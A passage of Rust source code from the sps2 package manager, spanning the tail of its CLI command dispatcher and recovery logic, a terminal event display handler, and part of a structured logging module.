// SBOM field removed (soft-disabled)
no_post,
output_dir,
} => {
let output_path = output_dir.as_deref();
let report = if let Some(dir) = directory {
// The manifest is required with --directory, so we can unwrap it.
let Some(manifest_path) = manifest else {
return Err(CliError::InvalidArguments(
"--manifest is required with --directory".to_string(),
));
};
sps2_ops::pack_from_directory(&ctx, &dir, &manifest_path, output_path).await?
} else if let Some(rec) = recipe {
if no_post {
sps2_ops::pack_from_recipe_no_post(&ctx, &rec, output_path).await?
} else {
sps2_ops::pack_from_recipe(&ctx, &rec, output_path).await?
}
} else {
// This case should be prevented by clap's arg group
return Err(CliError::InvalidArguments(
"Either --recipe or --directory must be specified".to_string(),
));
};
Ok(OperationResult::BuildReport(report))
}
Commands::SelfUpdate { skip_verify, force } => {
let result = sps2_ops::self_update(&ctx, skip_verify, force).await?;
Ok(OperationResult::Success(result))
}
Commands::Verify {
heal,
level,
scope,
sync_refcounts,
} => {
let result = sps2_ops::verify(&ctx, heal, &level, &scope, sync_refcounts).await?;
Ok(OperationResult::VerificationResult(result))
}
}
}
/// Build operations context with all required components
async fn build_ops_context(
setup: &SystemSetup,
event_sender: EventSender,
config: Config,
check_mode: bool,
) -> Result<sps2_ops::OpsCtx, CliError> {
let ctx = OpsContextBuilder::new()
.with_store(setup.store().clone())
.with_state(setup.state().clone())
.with_index(setup.index().clone())
.with_net(setup.net().clone())
.with_resolver(setup.resolver().clone())
.with_builder(setup.builder())
.with_event_sender(event_sender)
.with_config(config)
.with_check_mode(check_mode)
.build()?;
Ok(ctx)
}
/// Initialize tracing/logging
fn init_tracing(json_mode: bool, debug_enabled_flag: bool) {
// Check if debug logging is enabled
let debug_enabled = std::env::var("RUST_LOG").is_ok() || debug_enabled_flag;
if json_mode {
// JSON mode: suppress all console output to avoid contaminating JSON
if debug_enabled {
// In debug mode with JSON, still log to file
let log_dir = std::path::Path::new(fixed_paths::LOGS_DIR);
if std::fs::create_dir_all(log_dir).is_ok() {
let log_file = log_dir.join(format!(
"sps2-{}.log",
chrono::Utc::now().format("%Y%m%d-%H%M%S")
));
if let Ok(file) = std::fs::File::create(&log_file) {
tracing_subscriber::fmt()
.json()
.with_writer(file)
.with_env_filter(
tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
|_| {
tracing_subscriber::EnvFilter::new(
"info,sps2=debug,sps2_ops=info",
)
},
),
)
.init();
return;
}
}
}
// Fallback: disable all logging in JSON mode
tracing_subscriber::fmt()
.with_writer(std::io::sink)
.with_env_filter("off")
.init();
} else if debug_enabled {
// Debug mode: structured JSON logs to file
let log_dir = std::path::Path::new(fixed_paths::LOGS_DIR);
if let Err(e) = std::fs::create_dir_all(log_dir) {
eprintln!("Warning: Failed to create log directory: {e}");
}
let log_file = log_dir.join(format!(
"sps2-{}.log",
chrono::Utc::now().format("%Y%m%d-%H%M%S")
));
match std::fs::File::create(&log_file) {
Ok(file) => {
tracing_subscriber::fmt()
.json()
.with_writer(file)
.with_env_filter(
tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
|_| tracing_subscriber::EnvFilter::new("info,sps2=debug,sps2_ops=info"),
),
)
.init();
eprintln!("Debug logging enabled: {}", log_file.display());
}
Err(e) => {
eprintln!("Warning: Failed to create log file: {e}");
// Fallback to stderr
tracing_subscriber::fmt()
.with_env_filter(
tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(
|_| tracing_subscriber::EnvFilter::new("info,sps2=info,sps2_ops=info"),
),
)
.init();
}
}
} else {
// Normal mode: minimal logging to stderr
tracing_subscriber::fmt()
.with_env_filter(
tracing_subscriber::EnvFilter::try_from_default_env().unwrap_or_else(|_| {
tracing_subscriber::EnvFilter::new("warn,sps2=warn,sps2_ops=warn")
}),
)
.init();
}
}
/// Show PATH reminder if needed
fn show_path_reminder_if_needed() {
let path = std::env::var("PATH").unwrap_or_default();
if !path.contains(fixed_paths::BIN_DIR) {
eprintln!();
eprintln!(
"Add {} to your PATH to use installed packages:",
fixed_paths::BIN_DIR
);
eprintln!(
" echo 'export PATH=\"{}:$PATH\"' >> ~/.zshrc",
fixed_paths::BIN_DIR
);
eprintln!(" source ~/.zshrc");
eprintln!();
}
}
/// Apply CLI configuration overrides (highest precedence)
fn apply_cli_config(
config: &mut Config,
global: &cli::GlobalArgs,
command: &cli::Commands,
) -> Result<(), CliError> {
// Global CLI flags override everything
if let Some(color) = &global.color {
config.general.color = *color;
}
// Command-specific CLI flags
if let cli::Commands::Build {
jobs: Some(job_count),
..
} = command
{
config.builder.build.build_jobs = *job_count;
}
Ok(())
}
/// Checks for and completes an interrupted transaction
async fn recover_if_needed(state_manager: &StateManager) -> Result<(), CliError> {
if let Some(journal) = state_manager.read_journal().await? {
warn!("Warning: A previous operation was interrupted. Attempting to recover...");
match journal.phase {
TransactionPhase::Prepared => {
// The DB is prepared, filesystem step may or may not have completed.
// New default behavior does an atomic rename of staging -> live.
// If staging still exists, complete the rename; otherwise, assume it completed and just finalize DB.
if sps2_platform::filesystem_helpers::exists(&journal.staging_path).await {
info!("Recovery: Completing filesystem finalize (rename + DB finalize)");
state_manager
.execute_filesystem_swap_and_finalize(journal)
.await?;
} else {
info!("Recovery: Staging missing; assuming filesystem step completed. Finalizing DB state only.");
state_manager
.finalize_db_state(journal.new_state_id)
.await?;
state_manager.clear_journal().await?;
}
}
TransactionPhase::Swapped => {
// The FS swap happened, but the DB wasn't finalized.
// We only need to finalize the DB state.
info!("Recovery: Finalizing database state");
state_manager
.finalize_db_state(journal.new_state_id)
.await?;
state_manager.clear_journal().await?;
}
}
warn!("Recovery successful.");
}
Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/events.rs | apps/sps2/src/events.rs | //! Event handling and progress display
use crate::logging::log_event_with_tracing;
use console::{style, Term};
use sps2_events::{
events::{LifecycleEvent, LifecycleStage, LifecycleUpdateOperation},
AppEvent, EventMessage, EventMeta, ProgressEvent,
};
use std::collections::HashMap;
use std::time::Duration;
/// Event severity levels for UI styling
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum EventSeverity {
/// Debug information (shown only with --debug)
Debug,
/// Normal informational messages
Info,
/// Success messages
Success,
/// Warning messages
Warning,
/// Error messages
Error,
/// Critical errors
Critical,
}
/// UI styling configuration
#[derive(Clone)]
pub struct UiStyle {
/// Whether colors are supported
colors_enabled: bool,
/// Terminal instance for feature detection
term: Term,
}
impl UiStyle {
pub fn new(colors_enabled: bool) -> Self {
Self {
colors_enabled,
term: Term::stdout(),
}
}
/// Get styled prefix for event severity
pub fn get_prefix(&self, severity: EventSeverity) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return match severity {
EventSeverity::Debug => "[DEBUG]".to_string(),
EventSeverity::Info => "[INFO]".to_string(),
EventSeverity::Success => "[OK]".to_string(),
EventSeverity::Warning => "[WARN]".to_string(),
EventSeverity::Error => "[ERROR]".to_string(),
EventSeverity::Critical => "[CRITICAL]".to_string(),
};
}
// Use clean text prefixes
match severity {
EventSeverity::Debug => {
format!("{}", style("[DEBUG]").dim().cyan())
}
EventSeverity::Info => {
format!("{}", style("[INFO]").blue())
}
EventSeverity::Success => {
format!("{}", style("[OK]").green().bold())
}
EventSeverity::Warning => {
format!("{}", style("[WARN]").yellow().bold())
}
EventSeverity::Error => {
format!("{}", style("[ERROR]").red().bold())
}
EventSeverity::Critical => {
format!("{}", style("[CRITICAL]").red().bold().underlined())
}
}
}
/// Style message text based on severity
pub fn style_message(&self, message: &str, severity: EventSeverity) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return message.to_string();
}
match severity {
EventSeverity::Debug => style(message).dim().to_string(),
EventSeverity::Info => message.to_string(),
EventSeverity::Success => style(message).green().bold().to_string(),
EventSeverity::Warning => style(message).yellow().to_string(),
EventSeverity::Error => style(message).red().bold().to_string(),
EventSeverity::Critical => style(message).red().bold().to_string(),
}
}
/// Style message text for operations (with bold styling for important operations)
pub fn style_operation_message(
&self,
message: &str,
operation: &str,
severity: EventSeverity,
) -> String {
if !self.colors_enabled || !self.term.features().colors_supported() {
return message.to_string();
}
// Apply bold styling for important operations
let should_bold = matches!(
operation,
"install" | "uninstall" | "build" | "upgrade" | "rollback" | "health" | "2pc"
);
match severity {
EventSeverity::Debug => style(message).dim().to_string(),
EventSeverity::Info => {
if should_bold {
style(message).bold().to_string()
} else {
message.to_string()
}
}
EventSeverity::Success => style(message).green().bold().to_string(),
EventSeverity::Warning => {
if should_bold {
style(message).yellow().bold().to_string()
} else {
style(message).yellow().to_string()
}
}
EventSeverity::Error => style(message).red().bold().to_string(),
EventSeverity::Critical => style(message).red().bold().to_string(),
}
}
}
#[derive(Debug, Clone)]
struct ProgressState {
operation: String,
total: Option<u64>,
current: u64,
phases: Vec<String>,
current_phase: Option<usize>,
last_percent_reported: Option<u8>,
last_displayed_progress: u64,
}
/// Event handler for user feedback
pub struct EventHandler {
/// UI styling configuration
ui_style: UiStyle,
/// Whether debug mode is enabled
debug_enabled: bool,
/// Active progress trackers keyed by progress identifier
progress_states: HashMap<String, ProgressState>,
}
impl EventHandler {
pub fn new(colors_enabled: bool, debug_enabled: bool) -> Self {
Self {
ui_style: UiStyle::new(colors_enabled),
debug_enabled,
progress_states: HashMap::new(),
}
}
fn show_operation_message(&mut self, message: &str, operation: &str, severity: EventSeverity) {
let prefix = self.ui_style.get_prefix(severity);
let styled = self
.ui_style
.style_operation_message(message, operation, severity);
println!("{prefix} {styled}");
}
fn show_message(&mut self, message: &str, severity: EventSeverity) {
let prefix = self.ui_style.get_prefix(severity);
let styled = self.ui_style.style_message(message, severity);
println!("{prefix} {styled}");
}
/// Handle incoming event
pub fn handle_event(&mut self, message: EventMessage) {
// Log event with structured logging
log_event_with_tracing(&message);
let EventMessage { meta, event } = message;
match event {
// Download events
AppEvent::Lifecycle(LifecycleEvent::Download {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
self.handle_download_started(
&meta,
&context.url,
context.package.as_deref(),
context.total_bytes,
);
}
LifecycleStage::Completed => {
self.handle_download_completed(
&meta,
&context.url,
context.package.as_deref(),
context.bytes_downloaded.unwrap_or(0),
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
self.handle_download_failed(
&meta,
&context.url,
context.package.as_deref(),
&failure_ctx,
);
}
}
},
AppEvent::Lifecycle(LifecycleEvent::Acquisition {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleAcquisitionSource;
match stage {
LifecycleStage::Started => {
if let LifecycleAcquisitionSource::StoreCache { hash } = &context.source {
self.show_operation(
&meta,
format!(
"Reusing stored package {} {} (hash {})",
context.package, context.version, hash
),
"acquire",
EventSeverity::Info,
);
} else if self.debug_enabled {
self.show_meta_message(
&meta,
format!(
"Acquisition started for {} {}",
context.package, context.version
),
EventSeverity::Debug,
);
}
}
LifecycleStage::Completed => {
if let LifecycleAcquisitionSource::StoreCache { hash } = &context.source {
let size = context.size.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Prepared stored package {} {} ({}, hash {})",
context.package,
context.version,
self.format_bytes(size),
hash
),
"acquire",
EventSeverity::Success,
);
} else if self.debug_enabled {
let size = context.size.unwrap_or(0);
self.show_meta_message(
&meta,
format!(
"Acquisition completed for {} {} ({} bytes)",
context.package, context.version, size
),
EventSeverity::Debug,
);
}
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let message = match &context.source {
LifecycleAcquisitionSource::StoreCache { hash } => format!(
"Failed to prepare stored package {} {} (hash {}): {}",
context.package, context.version, hash, failure_ctx.message
),
LifecycleAcquisitionSource::Remote { .. } => format!(
"Acquisition failed for {} {}: {}",
context.package, context.version, failure_ctx.message
),
};
let severity = if failure_ctx.retryable {
EventSeverity::Warning
} else {
EventSeverity::Error
};
self.show_operation(&meta, message, "acquire", severity);
}
}
}
}
// Install events (replaces package events)
AppEvent::Lifecycle(LifecycleEvent::Install {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
self.show_operation(
&meta,
format!("Installing {} {}", context.package, context.version),
"install",
EventSeverity::Info,
);
}
LifecycleStage::Completed => {
let files = context.files_installed.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Installed {} {} ({} files)",
context.package, context.version, files
),
"install",
EventSeverity::Success,
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let sps2_events::FailureContext {
code: _,
message: failure_message,
hint,
retryable,
} = failure_ctx;
let retry_text = if retryable { " (retryable)" } else { "" };
let mut message = format!(
"Failed to install {} {}{}: {}",
context.package, context.version, retry_text, failure_message
);
if let Some(hint) = hint.as_ref() {
message.push_str(&format!(" (hint: {hint})"));
}
self.show_operation(&meta, message, "install", EventSeverity::Error);
}
}
},
AppEvent::Package(package_event) => {
use sps2_events::{events::PackageOutcome, PackageEvent};
match package_event {
PackageEvent::OperationStarted { operation } => {
self.show_operation(
&meta,
format!("{operation:?} started"),
"package",
EventSeverity::Info,
);
}
PackageEvent::OperationCompleted { operation, outcome } => {
let message = match outcome {
PackageOutcome::List { total } => {
format!("{operation:?} completed: {total} packages")
}
PackageOutcome::Search { query, total } => {
format!("Search for '{query}' matched {total} packages")
}
PackageOutcome::Health { healthy, issues } => {
if healthy {
"Health check completed successfully".to_string()
} else if issues.is_empty() {
"Health check reported issues".to_string()
} else {
format!(
"Health check reported {} issue(s): {}",
issues.len(),
issues.join(", ")
)
}
}
PackageOutcome::SelfUpdate {
from,
to,
duration_ms,
} => {
format!(
"Self-update completed: {from} -> {to} ({:.2}s)",
duration_ms as f64 / 1000.0
)
}
PackageOutcome::Cleanup {
states_removed,
packages_removed,
duration_ms,
} => {
format!(
"Cleanup removed {states_removed} states, {packages_removed} packages ({:.2}s)",
duration_ms as f64 / 1000.0
)
}
};
self.show_operation(&meta, message, "package", EventSeverity::Success);
}
PackageEvent::OperationFailed { operation, failure } => {
let hint = failure
.hint
.as_ref()
.map(|h| format!(" (hint: {h})"))
.unwrap_or_default();
self.show_operation(
&meta,
format!("{operation:?} failed: {}{}", failure.message, hint),
"package",
EventSeverity::Error,
);
}
}
}
// State events
AppEvent::State(state_event) => {
use sps2_events::StateEvent;
match state_event {
StateEvent::TransitionStarted { context } => {
let operation = &context.operation;
let target = context.target;
self.show_operation(
&meta,
format!("State transition started ({operation} -> {target})"),
"state",
EventSeverity::Info,
);
}
StateEvent::TransitionCompleted { context, summary } => {
let source_text = context
.source
.map(|s| s.to_string())
.unwrap_or_else(|| "<none>".to_string());
let duration_text = summary
.and_then(|s| s.duration_ms)
.map(|ms| format!(" in {:.2}s", ms as f64 / 1000.0))
.unwrap_or_default();
self.show_operation(
&meta,
format!(
"State transition completed ({}: {source_text} -> {}){duration_text}",
context.operation,
context.target
),
"state",
EventSeverity::Success,
);
}
StateEvent::TransitionFailed { context, failure } => {
self.show_operation(
&meta,
format!(
"State transition failed ({} -> {}): {}",
context.operation, context.target, failure.message
),
"state",
EventSeverity::Error,
);
}
StateEvent::RollbackStarted { context } => {
self.show_operation(
&meta,
format!("Rollback started ({} -> {})", context.from, context.to),
"rollback",
EventSeverity::Info,
);
}
StateEvent::RollbackCompleted { context, summary } => {
let duration_text = summary
.and_then(|s| s.duration_ms)
.map(|ms| format!(" in {:.2}s", ms as f64 / 1000.0))
.unwrap_or_default();
self.show_operation(
&meta,
format!(
"Rollback completed ({} -> {}){duration_text}",
context.from, context.to
),
"rollback",
EventSeverity::Success,
);
}
StateEvent::RollbackFailed { context, failure } => {
self.show_operation(
&meta,
format!(
"Rollback failed ({} -> {}): {}",
context.from, context.to, failure.message
),
"rollback",
EventSeverity::Error,
);
}
StateEvent::CleanupStarted { summary } => {
let planned = summary.planned_states;
if self.debug_enabled {
self.show_operation(
&meta,
format!("Cleanup planned for {planned} states"),
"clean",
EventSeverity::Debug,
);
}
}
StateEvent::CleanupCompleted { summary } => {
let removed = summary.removed_states.unwrap_or(0);
let bytes = summary.space_freed_bytes.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Cleanup completed: removed {} states, {} freed",
removed,
self.format_bytes(bytes)
),
"clean",
EventSeverity::Success,
);
}
StateEvent::CleanupFailed { summary, failure } => {
let planned = summary.planned_states;
self.show_operation(
&meta,
format!(
"Cleanup failed after planning {planned} states: {}",
failure.message
),
"clean",
EventSeverity::Error,
);
}
}
}
// Build events
AppEvent::Build(build_event) => {
use sps2_events::{BuildDiagnostic, BuildEvent, LogStream, PhaseStatus};
match build_event {
BuildEvent::Started { session, target } => {
let cache_text = if session.cache_enabled {
" (cache enabled)"
} else {
""
};
self.show_operation(
&meta,
format!(
"Build started for {} {} using {:?}{}",
target.package, target.version, session.system, cache_text
),
"build",
EventSeverity::Info,
);
}
BuildEvent::Completed {
target,
artifacts,
duration_ms,
..
} => {
let duration = std::time::Duration::from_millis(duration_ms);
let artifact_summary = if artifacts.is_empty() {
"no artifacts produced".to_string()
} else {
format!(
"{} artifact{}",
artifacts.len(),
if artifacts.len() == 1 { "" } else { "s" }
)
};
self.show_operation(
&meta,
format!(
"Build completed for {} {} in {} ({artifact_summary})",
target.package,
target.version,
format_duration(duration)
),
"build",
EventSeverity::Success,
);
}
BuildEvent::Failed {
target,
failure,
phase,
command,
..
} => {
let mut message = format!(
"Build failed for {} {}: {}{}{}",
target.package,
target.version,
failure
.code
.as_ref()
.map(|code| format!("[{code}] "))
.unwrap_or_default(),
failure.message,
failure
.hint
.as_ref()
.map(|hint| format!(" (hint: {hint})"))
.unwrap_or_default()
);
if let Some(phase) = phase {
message.push_str(&format!(" during phase {phase:?}"));
}
if let Some(command) = command {
message.push_str(&format!(" (command: {})", command.command));
}
let severity = if failure.retryable {
EventSeverity::Warning
} else {
EventSeverity::Error
};
self.show_operation(&meta, message, "build", severity);
}
BuildEvent::PhaseStatus { phase, status, .. } => match status {
PhaseStatus::Started => {
self.show_operation(
&meta,
format!("Entering build phase {phase:?}"),
"build",
EventSeverity::Info,
);
}
PhaseStatus::Completed { duration_ms } => {
let duration_text = duration_ms
.map(|ms| {
format!(
" in {}",
format_duration(std::time::Duration::from_millis(ms))
)
})
.unwrap_or_default();
self.show_operation(
&meta,
format!("Completed build phase {phase:?}{duration_text}"),
"build",
EventSeverity::Success,
);
}
},
BuildEvent::Diagnostic(diag) => match diag {
BuildDiagnostic::Warning {
message, source, ..
} => {
let source_text = source
.as_ref()
.map(|s| format!(" ({s})"))
.unwrap_or_default();
self.show_operation(
&meta,
format!("Build warning: {message}{source_text}"),
"build",
EventSeverity::Warning,
);
}
BuildDiagnostic::LogChunk { stream, text, .. } => {
let prefix = match stream {
LogStream::Stdout => "[build]",
LogStream::Stderr => "[build:stderr]",
};
for line in text.lines() {
println!("{prefix} {line}");
}
}
BuildDiagnostic::CachePruned {
removed_items,
freed_bytes,
} => {
if self.debug_enabled {
self.show_operation(
&meta,
format!(
"Build cache pruned: {removed_items} entries, {} freed",
self.format_bytes(freed_bytes)
),
"build",
EventSeverity::Debug,
);
}
}
},
}
}
// Resolver events
AppEvent::Lifecycle(LifecycleEvent::Resolver {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
let mut parts = Vec::new();
let runtime_targets = context.runtime_targets.unwrap_or(0);
let build_targets = context.build_targets.unwrap_or(0);
let local_targets = context.local_targets.unwrap_or(0);
if runtime_targets > 0 {
parts.push(format!("{} runtime", runtime_targets));
}
if build_targets > 0 {
parts.push(format!("{} build", build_targets));
}
if local_targets > 0 {
parts.push(format!("{} local", local_targets));
}
if parts.is_empty() {
parts.push("no targets".to_string());
}
self.show_operation(
&meta,
format!("Resolving dependencies ({})", parts.join(", ")),
"resolve",
EventSeverity::Info,
);
}
LifecycleStage::Completed => {
let total_packages = context.total_packages.unwrap_or(0);
let downloaded_packages = context.downloaded_packages.unwrap_or(0);
let reused_packages = context.reused_packages.unwrap_or(0);
let duration_ms = context.duration_ms.unwrap_or(0);
let mut message =
format!("Resolved {} packages in {}ms", total_packages, duration_ms);
if downloaded_packages > 0 {
message.push_str(&format!(" • downloads: {}", downloaded_packages));
}
if reused_packages > 0 {
message.push_str(&format!(" • reused: {}", reused_packages));
}
self.show_operation(&meta, message, "resolve", EventSeverity::Success);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let code_prefix = failure_ctx
.code
.as_deref()
.map(|code| format!("[{code}] "))
.unwrap_or_default();
let mut message =
format!("Resolution failed: {code_prefix}{}", failure_ctx.message);
if !context.conflicting_packages.is_empty() {
let sample = context
.conflicting_packages
.iter()
.take(3)
.cloned()
.collect::<Vec<_>>();
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/logging.rs | apps/sps2/src/logging.rs | //! Structured logging integration for events
//!
//! This module provides structured logging capabilities that integrate with the
//! tracing ecosystem, converting domain-specific events into appropriate log
//! records with structured fields.
use sps2_events::{AppEvent, EventMessage};
use tracing::{debug, error, info, trace, warn};
/// Log an AppEvent using the tracing infrastructure with structured fields
///
/// This function takes an AppEvent and logs it at the appropriate level with
/// structured fields that can be consumed by observability tools.
pub fn log_event_with_tracing(message: &EventMessage) {
let event = &message.event;
let meta = &message.meta;
let level = meta.tracing_level();
// Extract structured fields based on event type
match event {
// Download domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Download {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
total_bytes = ?context.total_bytes,
"Download started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
bytes_downloaded = ?context.bytes_downloaded,
"Download completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Download failed"
);
}
}
}
}
AppEvent::Build(build_event) => {
use sps2_events::{BuildDiagnostic, BuildEvent, LogStream, PhaseStatus};
match build_event {
BuildEvent::Started { session, target } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
system = ?session.system,
cache_enabled = session.cache_enabled,
"Build started"
);
}
BuildEvent::Completed {
target,
artifacts,
duration_ms,
..
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
artifacts = artifacts.len(),
duration_ms,
"Build completed"
);
}
BuildEvent::Failed {
target,
failure,
phase,
command,
..
} => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
phase = ?phase,
command = ?command.as_ref().map(|c| &c.command),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Build failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
phase = ?phase,
command = ?command.as_ref().map(|c| &c.command),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Build failed",
);
}
}
BuildEvent::PhaseStatus { phase, status, .. } => match status {
PhaseStatus::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
phase = ?phase,
"Build phase started"
);
}
PhaseStatus::Completed { duration_ms } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
phase = ?phase,
duration_ms,
"Build phase completed"
);
}
},
BuildEvent::Diagnostic(diag) => match diag {
BuildDiagnostic::Warning {
message,
source: warn_source,
..
} => {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
diagnostic_source = ?warn_source,
message = %message,
"Build warning",
);
}
BuildDiagnostic::LogChunk { stream, text, .. } => match stream {
LogStream::Stdout => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
stream = "stdout",
text = %text,
"Build output"
);
}
LogStream::Stderr => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
stream = "stderr",
text = %text,
"Build output"
);
}
},
BuildDiagnostic::CachePruned {
removed_items,
freed_bytes,
} => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
removed_items,
freed_bytes,
"Build cache pruned"
);
}
},
}
}
AppEvent::Guard(guard_event) => {
use sps2_events::{GuardEvent, GuardScope, GuardSeverity};
fn scope_label(scope: &GuardScope) -> String {
match scope {
GuardScope::System => "system".to_string(),
GuardScope::Package { name, version } => version
.as_ref()
.map(|v| format!("{name}:{v}"))
.unwrap_or_else(|| name.clone()),
GuardScope::Path { path } => path.clone(),
GuardScope::State { id } => format!("state {id}"),
GuardScope::Custom { description } => description.clone(),
}
}
match guard_event {
GuardEvent::VerificationStarted {
scope,
level,
targets,
..
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
level = ?level,
packages = targets.packages,
files = ?targets.files,
"Guard verification started"
);
}
GuardEvent::VerificationCompleted {
scope,
discrepancies,
metrics,
..
} => {
if *discrepancies == 0 {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
coverage = metrics.coverage_percent,
cache_hit_rate = metrics.cache_hit_rate,
duration_ms = metrics.duration_ms,
"Guard verification completed",
);
} else {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
discrepancies = *discrepancies,
coverage = metrics.coverage_percent,
cache_hit_rate = metrics.cache_hit_rate,
duration_ms = metrics.duration_ms,
"Guard verification completed with findings",
);
}
}
GuardEvent::VerificationFailed { scope, failure, .. } => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard verification failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard verification failed",
);
}
}
GuardEvent::HealingStarted { plan, .. } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
total = plan.total,
auto = plan.auto_heal,
confirmation = plan.confirmation_required,
manual = plan.manual_only,
"Guard healing started",
);
}
GuardEvent::HealingCompleted {
healed,
failed,
duration_ms,
..
} => {
if *failed == 0 {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
failed = *failed,
duration_ms = *duration_ms,
"Guard healing completed",
);
} else {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
failed = *failed,
duration_ms = *duration_ms,
"Guard healing completed with failures",
);
}
}
GuardEvent::HealingFailed {
failure, healed, ..
} => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard healing failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard healing failed",
);
}
}
GuardEvent::DiscrepancyReported { discrepancy, .. } => {
let severity = match discrepancy.severity {
GuardSeverity::Critical => "critical",
GuardSeverity::High => "high",
GuardSeverity::Medium => "medium",
GuardSeverity::Low => "low",
};
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
severity,
kind = %discrepancy.kind,
location = ?discrepancy.location,
package = ?discrepancy.package,
version = ?discrepancy.version,
auto_heal = discrepancy.auto_heal_available,
confirmation = discrepancy.requires_confirmation,
message = %discrepancy.message,
"Guard discrepancy reported",
);
}
}
}
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Resolver {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
runtime_targets = ?context.runtime_targets,
build_targets = ?context.build_targets,
local_targets = ?context.local_targets,
"Dependency resolution started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
total_packages = ?context.total_packages,
downloaded_packages = ?context.downloaded_packages,
reused_packages = ?context.reused_packages,
duration_ms = ?context.duration_ms,
"Dependency resolution completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
if failure_ctx.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
conflicts = ?context.conflicting_packages,
